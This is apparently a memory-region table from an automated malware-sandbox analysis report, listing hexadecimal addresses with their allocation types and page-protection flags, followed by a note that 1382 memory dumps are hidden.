page read and write
5159000
heap
page read and write
3C6E000
stack
page read and write
4DF0000
heap
page read and write
464000
heap
page read and write
33A4000
heap
page read and write
3635000
trusted library allocation
page read and write
322000
heap
page read and write
164000
heap
page read and write
33DB000
heap
page read and write
448A000
heap
page read and write
333E000
heap
page read and write
4DF6000
heap
page read and write
4AE000
heap
page read and write
1FB7000
direct allocation
page read and write
1AAC0000
heap
page read and write
924000
heap
page read and write
7FE8B0D6000
trusted library allocation
page read and write
580000
heap
page read and write
4739000
heap
page read and write
3635000
trusted library allocation
page read and write
1C84F000
stack
page read and write
3DBF000
trusted library allocation
page read and write
2C0000
heap
page read and write
4DF6000
heap
page read and write
29B000
heap
page read and write
468E000
heap
page read and write
7FE8B270000
trusted library allocation
page read and write
7FE8B330000
trusted library allocation
page read and write
34F9000
trusted library allocation
page read and write
514B000
heap
page read and write
154000
heap
page read and write
7B3000
unkown
page read and write
7B3000
unkown
page read and write
1AE6B000
heap
page read and write
3B4A000
trusted library allocation
page read and write
4599000
heap
page read and write
450D000
heap
page read and write
4719000
heap
page read and write
7FE89830000
trusted library allocation
page read and write
4741000
heap
page read and write
1C16C000
stack
page read and write
278000
heap
page read and write
450A000
heap
page read and write
1C48D000
stack
page read and write
49D000
heap
page read and write
20FE000
stack
page read and write
307C000
stack
page read and write
459000
heap
page read and write
4DAD000
heap
page read and write
3B4A000
trusted library allocation
page read and write
450B000
heap
page read and write
4C7C000
heap
page read and write
451C000
heap
page read and write
5159000
heap
page read and write
34FF000
trusted library allocation
page read and write
192000
stack
page read and write
67000
heap
page read and write
49E000
heap
page read and write
4599000
heap
page read and write
464000
heap
page read and write
34F9000
trusted library allocation
page read and write
400000
unkown
page readonly
3DBF000
trusted library allocation
page read and write
1A658000
heap
page execute and read and write
3680000
heap
page read and write
4599000
heap
page read and write
7FE8B02D000
trusted library allocation
page execute and read and write
1CA60000
heap
page read and write
4500000
heap
page read and write
450F000
heap
page read and write
3535000
heap
page read and write
154000
heap
page read and write
7FE89990000
trusted library allocation
page read and write
2672000
trusted library allocation
page read and write
4650000
heap
page read and write
64A000
heap
page read and write
1F84000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
3B4A000
trusted library allocation
page read and write
458A000
heap
page read and write
18C000
stack
page read and write
7FE89AA0000
trusted library allocation
page read and write
34FD000
trusted library allocation
page read and write
4508000
heap
page read and write
4468000
heap
page read and write
1AE000
heap
page read and write
350000
heap
page read and write
496000
heap
page read and write
3B4D000
trusted library allocation
page read and write
3B4A000
trusted library allocation
page read and write
7FE8B1D7000
trusted library allocation
page read and write
3429000
heap
page read and write
52E0000
trusted library allocation
page read and write
363F000
trusted library allocation
page read and write
37D0000
trusted library allocation
page read and write
4A2000
heap
page read and write
276B000
heap
page read and write
3B4A000
trusted library allocation
page read and write
3025000
trusted library allocation
page read and write
4D1F000
heap
page read and write
448A000
heap
page read and write
474000
heap
page read and write
3C8A000
trusted library allocation
page read and write
4CF9000
heap
page read and write
12438000
trusted library allocation
page read and write
3502000
trusted library allocation
page read and write
83E000
stack
page read and write
2BE000
heap
page read and write
34E000
heap
page read and write
4D19000
heap
page read and write
130000
heap
page read and write
624000
heap
page read and write
3349000
heap
page read and write
377C000
trusted library allocation
page read and write
471D000
heap
page read and write
450A000
heap
page read and write
4DF6000
heap
page read and write
3E6000
heap
page read and write
322000
heap
page read and write
1C54C000
stack
page read and write
44F8000
heap
page read and write
33A4000
heap
page read and write
450D000
heap
page read and write
475B000
heap
page read and write
7FE899C0000
trusted library allocation
page read and write
34E0000
heap
page read and write
4599000
heap
page read and write
468E000
heap
page read and write
3FD000
heap
page read and write
308000
heap
page read and write
401000
unkown
page execute read
4D97000
heap
page read and write
3B00000
trusted library allocation
page read and write
34C0000
remote allocation
page read and write
324000
heap
page read and write
7D1000
unkown
page read and write
3DBF000
trusted library allocation
page read and write
408000
unkown
page readonly
12C000
heap
page read and write
280000
heap
page read and write
342A000
heap
page read and write
321000
heap
page read and write
2B0000
trusted library allocation
page read and write
33D9000
heap
page read and write
494000
heap
page read and write
4C16000
heap
page read and write
474000
heap
page read and write
634000
heap
page read and write
4596000
heap
page read and write
34FD000
trusted library allocation
page read and write
111000
heap
page read and write
442B000
stack
page read and write
213F000
stack
page read and write
7FE89AE9000
trusted library allocation
page read and write
4703000
heap
page read and write
458B000
heap
page read and write
350000
heap
page read and write
33C3000
heap
page read and write
4DCA000
heap
page read and write
450F000
heap
page read and write
1C315000
heap
page read and write
7FE8B1C0000
trusted library allocation
page read and write
100000
heap
page read and write
277F000
trusted library allocation
page read and write
3384000
heap
page read and write
352A000
direct allocation
page execute and read and write
34F6000
trusted library allocation
page read and write
1A639000
stack
page read and write
1A7BE000
heap
page read and write
266000
heap
page read and write
45C000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
3635000
trusted library allocation
page read and write
134000
heap
page read and write
7FE89B18000
trusted library allocation
page read and write
46C000
heap
page read and write
2628000
heap
page read and write
1DB0000
heap
page execute and read and write
322000
heap
page read and write
2280000
heap
page read and write
7FE8B040000
trusted library allocation
page read and write
1AA98000
stack
page read and write
240000
heap
page read and write
446000
heap
page read and write
401000
unkown
page execute read
474000
heap
page read and write
252D000
trusted library allocation
page read and write
18C000
stack
page read and write
583000
direct allocation
page read and write
2190000
heap
page read and write
7FE8978D000
trusted library allocation
page execute and read and write
26B0000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
3352000
heap
page read and write
3C8A000
trusted library allocation
page read and write
3B4D000
trusted library allocation
page read and write
401000
unkown
page execute read
3C8A000
trusted library allocation
page read and write
451C000
heap
page read and write
7FE8993C000
trusted library allocation
page read and write
5BE000
heap
page read and write
314000
heap
page read and write
3B4D000
trusted library allocation
page read and write
458D000
heap
page read and write
3DBF000
trusted library allocation
page read and write
33C6000
heap
page read and write
43A0000
heap
page read and write
4DD6000
heap
page read and write
7FE89784000
trusted library allocation
page read and write
217D000
stack
page read and write
3C8A000
trusted library allocation
page read and write
7FE8B03B000
trusted library allocation
page read and write
459A000
heap
page read and write
1B1D6000
heap
page read and write
25E0000
trusted library allocation
page read and write
4651000
heap
page read and write
4AE000
heap
page read and write
33A6000
heap
page read and write
470000
heap
page read and write
28D000
heap
page read and write
18E000
heap
page read and write
1EE0000
direct allocation
page read and write
3D9B000
stack
page read and write
2300000
heap
page read and write
4C12000
heap
page read and write
7FE89A75000
trusted library allocation
page read and write
308000
heap
page read and write
1B42B000
stack
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
3B4D000
trusted library allocation
page read and write
363F000
trusted library allocation
page read and write
314000
heap
page read and write
1B0DE000
stack
page read and write
3B4A000
trusted library allocation
page read and write
1A8AF000
heap
page read and write
3F2F000
stack
page read and write
413000
heap
page read and write
2D5000
heap
page read and write
4500000
heap
page read and write
363F000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
4D97000
heap
page read and write
1AD80000
heap
page read and write
124BD000
trusted library allocation
page read and write
4594000
heap
page read and write
332B000
stack
page read and write
46A8000
heap
page read and write
7FE8B224000
trusted library allocation
page read and write
3F2000
heap
page read and write
1B77E000
stack
page read and write
4B20000
trusted library allocation
page read and write
4DF4000
heap
page read and write
12471000
trusted library allocation
page read and write
23AB000
heap
page read and write
4720000
heap
page read and write
33D9000
heap
page read and write
33A6000
heap
page read and write
1C249000
heap
page read and write
6A2B6000
unkown
page readonly
497000
heap
page read and write
4C33000
heap
page read and write
5120000
heap
page read and write
5149000
heap
page read and write
29BF000
stack
page read and write
450D000
heap
page read and write
464C000
heap
page read and write
474000
heap
page read and write
1CA0B000
stack
page read and write
7FE899F0000
trusted library allocation
page read and write
244000
heap
page read and write
4B20000
trusted library allocation
page read and write
3C8A000
trusted library allocation
page read and write
1F80000
heap
page read and write
33BB000
heap
page read and write
7FE8B310000
trusted library allocation
page read and write
3B4A000
trusted library allocation
page read and write
7FE8B2F0000
trusted library allocation
page read and write
955000
heap
page read and write
3AFF000
stack
page read and write
7FE8B1D3000
trusted library allocation
page read and write
458A000
heap
page read and write
4DD1000
heap
page read and write
1C4B0000
heap
page read and write
2B25000
trusted library allocation
page read and write
3DBF000
trusted library allocation
page read and write
4490000
heap
page read and write
7FE899D0000
trusted library allocation
page read and write
40A000
heap
page read and write
2471000
trusted library allocation
page read and write
7FE8B210000
trusted library allocation
page execute and read and write
43A1000
heap
page read and write
907000
heap
page read and write
3DE2000
trusted library allocation
page read and write
62B000
heap
page read and write
168000
heap
page read and write
3635000
trusted library allocation
page read and write
34FE000
trusted library allocation
page read and write
321000
heap
page read and write
363F000
trusted library allocation
page read and write
There are 1382 hidden memdumps, click here to show them.